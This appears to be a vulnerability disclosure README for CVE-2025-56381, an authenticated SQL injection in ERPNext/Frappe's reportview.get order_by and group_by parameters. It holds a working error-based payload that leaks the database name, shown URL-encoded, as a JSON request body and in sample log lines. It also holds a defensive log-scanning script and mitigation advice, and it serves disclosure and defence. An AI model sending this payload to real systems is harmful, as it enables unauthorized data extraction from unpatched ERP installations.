
CVE-2025-56381 PoC — ERPNEXT Security Vulnerability

Source
Associated Vulnerability
Title: ERPNEXT Security Vulnerability (CVE-2025-56381)
Description: ERPNext is an open-source enterprise resource planning solution from the Indian company ERPNext. ERPNEXT v15.67.0 contains a security vulnerability caused by the unvalidated order_by and group_by parameters, which may lead to SQL injection attacks.
Description
ERPNEXT v15.67.0 was discovered to contain multiple SQL injection vulnerabilities in the /api/method/frappe.desk.reportview.get endpoint via the order_by and group_by parameters.
Readme
# CVE-2025-56381 — Authenticated SQL Injection in ERPNext / Frappe via `order_by` and `group_by` Parameters

📌 **Summary**
ERPNext v15.67.0 and Frappe Framework v15.72.4 contain multiple **authenticated SQL injection vulnerabilities** in the `frappe.desk.reportview.get` API endpoint. Malicious input to the `order_by` or `group_by` parameters can be used to inject and execute arbitrary SQL statements. This allows an authenticated user (with basic access to reports) to extract sensitive data, perform database enumeration, and potentially manipulate or escalate privileges within the system.

---

## 🛠 Technical Details

* **Vulnerability Type:** SQL Injection (CWE-89)
* **Affected Product(s):** ERPNext / Frappe
* **Affected Versions:**

  * Frappe — **15.72.4**
  * ERPNext — **15.67.0**
* **Affected Endpoint:**

  ```
  POST /api/method/frappe.desk.reportview.get
  ```
* **Vulnerable Parameters:**

  * `order_by`
  * `group_by`
* **Authentication Required:** Yes (valid session via `sid` cookie)
* **Attack Type:** Remote
* **Severity:** High (SQL code execution, data exfiltration, potential privilege escalation)
* **Estimated CVSS v3.1 Score:** **8.6 (High)** — *estimate; final score should be assigned by official CVE authority.*
* **Status:** Not fixed (as of disclosure)
* **Discovered by:** Mohammed Aloli ([GitHub](https://github.com/MoAlali), [X](https://x.com/alaliksa_), [LinkedIn](https://www.linkedin.com/in/mohammedaloli/))
* **CVE ID:** **CVE-2025-56381**

---

## 🚀 Proof of Concept (PoC) — Error-based SQL Injection
<img width="1072" height="1376" alt="image" src="https://github.com/user-attachments/assets/ef4a77fa-a9f5-417f-baf0-5ebcef3523ce" />

> ✅ Test only on systems you **own** or have **explicit permission** to test. Do **not** use against production systems without consent.

### ❗ Payload (URL-encoded):

```text
%28select%20updatexml%28null%2Cconcat%280x7e%2Cdatabase%28%29%2C0x7e%29%2Cnull%29%29
```

### Example JSON Body (POST Request):

```json
{
  "doctype": "User",
  "order_by": "(select updatexml(null,concat(0x7e,database(),0x7e),null))"
}
```

Sending this request returns a database error whose message contains the current database name, wrapped in the `~` characters supplied as `0x7e` in the payload. This confirms that the injected SQL was executed and the database name has been leaked.

---

## 🧪 Exploitation Scenario

1. An attacker logs into an ERPNext/Frappe instance with basic permissions (e.g., access to standard reports).
2. A crafted POST request is sent to `/api/method/frappe.desk.reportview.get` with a malicious `order_by` or `group_by` payload.
3. The backend interpolates this value directly into the SQL query without validation or sanitization.
4. The attacker receives a database error containing the injected output, which confirms the injection.
5. The same technique could be chained with time-based payloads, UNION-based injection, or privilege escalation paths depending on the underlying database configuration.
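
What the scenario above looks like from the server side, as an added example that is not part of the original advisory: a small Python scanner over constructed request-log lines (the log format, the session ids and the contents of `SAMPLE_LOG` are assumptions, not real captures) that flags `order_by`/`group_by` values which do not fit the grammar of a plain column list, and counts 5xx responses per session, since repeated server errors on flagged requests from one session are the signature of error-based probing.

```python
import json
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample log (not a real capture): one JSON object per line, as a
# reverse proxy or API gateway in front of Frappe might emit. "body" is the
# raw application/x-www-form-urlencoded request body.
SAMPLE_LOG = """\
{"sid": "sess-a", "path": "/api/method/frappe.desk.reportview.get", "status": 200, "body": "doctype=User&order_by=modified+desc"}
{"sid": "sess-b", "path": "/api/method/frappe.desk.reportview.get", "status": 500, "body": "doctype=User&order_by=%28select%20updatexml%28null%2Cconcat%280x7e%2Cdatabase%28%29%2C0x7e%29%2Cnull%29%29"}
{"sid": "sess-b", "path": "/api/method/frappe.desk.reportview.get", "status": 500, "body": "doctype=User&group_by=%28select%201%29"}
{"sid": "sess-c", "path": "/api/method/frappe.ping", "status": 200, "body": ""}
{"sid": "sess-a", "path": "/api/method/frappe.desk.reportview.get", "status": 200, "body": "doctype=User&order_by=%60tabUser%60.%60name%60+asc"}
"""

WATCHED_PATH = "/api/method/frappe.desk.reportview.get"
WATCHED_PARAMS = ("order_by", "group_by")

# Grammar of a benign clause: comma-separated identifiers (optionally
# backtick-quoted and table-qualified), each with an optional asc/desc.
# Parentheses, function calls and subqueries cannot match this.
IDENT = r"`?[A-Za-z_][A-Za-z0-9_]*`?(?:\.`?[A-Za-z_][A-Za-z0-9_]*`?)?"
TERM = rf"{IDENT}(?:\s+(?:asc|desc))?"
CLAUSE_RE = re.compile(rf"^\s*{TERM}(?:\s*,\s*{TERM})*\s*$", re.IGNORECASE)


def suspicious_values(body):
    """Return (param, decoded value) pairs whose value is not a plain ordering clause."""
    params = parse_qs(body, keep_blank_values=True)
    hits = []
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if not CLAUSE_RE.match(value):
                hits.append((name, value))
    return hits


def scan_log(text):
    """Return (findings, server_errors_per_session) for requests to the watched endpoint.

    A finding is a request whose order_by/group_by fails the benign grammar; the
    per-session count of 5xx responses among those requests is what error-based
    probing looks like from the server side.
    """
    findings = []
    errors_per_sid = Counter()
    for line in text.splitlines():
        if not line.strip():
            continue
        entry = json.loads(line)
        if entry["path"] != WATCHED_PATH:
            continue
        hits = suspicious_values(entry["body"])
        if not hits:
            continue
        findings.append({"sid": entry["sid"], "status": entry["status"], "params": hits})
        if entry["status"] >= 500:
            errors_per_sid[entry["sid"]] += 1
    return findings, errors_per_sid


if __name__ == "__main__":
    found, errors = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"ALERT session={f['sid']} status={f['status']} params={f['params']}")
    print("5xx responses to flagged requests per session:", dict(errors))
```

The grammar deliberately accepts the table-qualified, backtick-quoted form that legitimate clients send, so a benign `` `tabUser`.`name` asc `` from `sess-a` is not flagged while both requests from `sess-b` are. Alerting on the per-session 5xx count rather than on a single hit keeps noise from one-off typos low.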

---

## 🔐 Mitigation Recommendations

1. **Use Parameterized Queries:** All user input must be bound securely and **never** concatenated directly into SQL queries.
2. **Strict Input Validation:** Validate `order_by` and `group_by` against a known allowlist of acceptable column names before processing.
3. **Escape Identifiers Properly:** Use DBMS-specific escaping for column/field identifiers if dynamic usage is required.
4. **Minimize Exposure:** Restrict access to the `/reportview.get` API and report features based on user roles and trust levels.
5. **Sanitize Logs:** Avoid logging raw injection payloads to prevent leakage in audit systems.
6. **Rate Limit API Requests:** Throttle high-frequency API calls to reduce the impact of blind or error-based enumeration attempts.
7. **Apply Patches:** Frappe maintainers should release a patch securing this endpoint and audit other `frappe.desk` methods. Operators should upgrade as soon as a patch is available.

---

## 🔗 References

* Discoverer: [Mohammed Aloli](https://www.linkedin.com/in/mohammedaloli/)

  * GitHub: [MoAlali](https://github.com/MoAlali)
  * X (Twitter): [@alaliksa_](https://x.com/alaliksa_)
* Frappe Framework: [https://github.com/frappe/frappe](https://github.com/frappe/frappe)
* ERPNext Project: [https://github.com/frappe/erpnext](https://github.com/frappe/erpnext)
* OWASP SQL Injection Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)

## 📢 Disclaimer

This advisory is published for educational and defensive security research purposes only. Exploiting this vulnerability without authorization is illegal and unethical. If you're a developer or administrator of ERPNext or Frappe, apply the recommended mitigations immediately and monitor for unusual API usage.

---
File Snapshot

[4.0K] /data/pocs/57275b719f4dfb7e950d525c95367d638f187531
├── [1.2K] advisory.md
├── [1.5K] cve.json
└── [4.7K] README.md

1 directory, 3 files